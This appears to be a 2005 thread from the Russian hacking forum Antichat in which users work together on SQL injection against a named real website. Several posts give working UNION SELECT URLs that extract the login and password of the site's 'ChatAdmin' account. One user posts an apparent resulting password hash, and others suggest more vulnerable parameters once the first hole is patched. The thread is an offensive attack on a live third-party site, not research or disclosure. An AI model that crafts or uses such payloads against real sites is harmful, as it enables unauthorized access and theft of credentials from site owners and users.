Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Sql иньекция в nepom.ru (https://forum.antichat.xyz/showthread.php?t=9840)

Thief 04.10.2005 07:47

Sql иньекция в nepom.ru
 
Коротко и ясно уязвимость обнаружел на http://nepom.ru/users/?login=' Далее не могу понять как открыть таблицы Вродебы пишу всё правильно.
Пример http://nepom.ru/users/?login=-1%20UN...ll,null%20FROM w3t Users WHERE U_Username='admin'/*
ИТД помогите разобраться....

bul666 04.10.2005 15:26

А от куда ты знаешь имена таблиц?

virgoz 04.10.2005 15:51

1. У тебя неправильный синтаксис: после -1 нужно ставить ', а потом комментировать т.к. в запросе значение взято в кавычки.
2. Ты выбираешь 5 столбцов, когда там нужно всего один.
3. Нет вывода результата, поэтому посмотреть пароль не получится.
Поэтому тебе нужно искать другую sql-инъекцию :)
Если бы был вывод, правильный запрос был бы вот такой:
Цитата:

http://nepom.ru/users/?login=-1'%20UNION%20SELECT%20passwd%20FROM%20users/*

virgoz 04.10.2005 16:01

Вот тебе настоящая sql-инъекция! :)
Цитата:

http://nepom.ru/interest/full.php?id=-1'%20UNION%20SELECT%201,2,login,id,passwd,6,7,8,9% 20FROM%20users%20where%20login='ChatAdmin'/*
Сейчас только логины менять ;)

Thief 04.10.2005 16:26

Цитата:

http://nepom.ru/interest/full.php?id=-1'%20UNION%20SELECT%201,2,login,id,passwd,6,7,8,9% 20FROM%20users%20where%20login='ChatAdmin'/*
SQL скорее всего не получиться... т.к. он выбирает id, а id скорее всего INTEGER, а пароль VARCHAR.... скорее всего... поэтому UNION не работает... выбор идет только по одному INTEGER полю
Если вам не лень посмотрите может я ошибаюсь... Спасибо!

virgoz 04.10.2005 16:43

Вот так:
Цитата:

http://nepom.ru/interest/full.php?id=-1'+UNION+SELECT+1,2,login,id,passwd,6,7,8,9+FROM+u sers+where+login='ChatAdmin'/*
!!! Когда будете вставлять, в слове "u sers" уберите пробел :)

Morph 06.10.2005 06:27

Ххыхыхыхых хеш 123

Thief 06.10.2005 09:05

http://nepom.ru/interest/full.php?id=-1'+UNION+SELECT+1,2,login,id,passwd,6,7,8,9+FROM+u sers+where+login='ChatAdmin'/*
Выполняю данный запрос 1 назад всё работоло сей час что-то не работает видать нашли багу. Ктонить может обьяснить что произошло.....

Deem3n® 06.10.2005 09:32

багу прикрыли

а http://nepom.ru/users/?login=' еще работает

k1b0rg 06.10.2005 09:34

лично у меня ваще высветило что страницы full.php нету
попробуй на других страницах типа
http://nepom.ru/interest/?raz=1%27
http://nepom.ru/users/?login=%27


Время: 09:22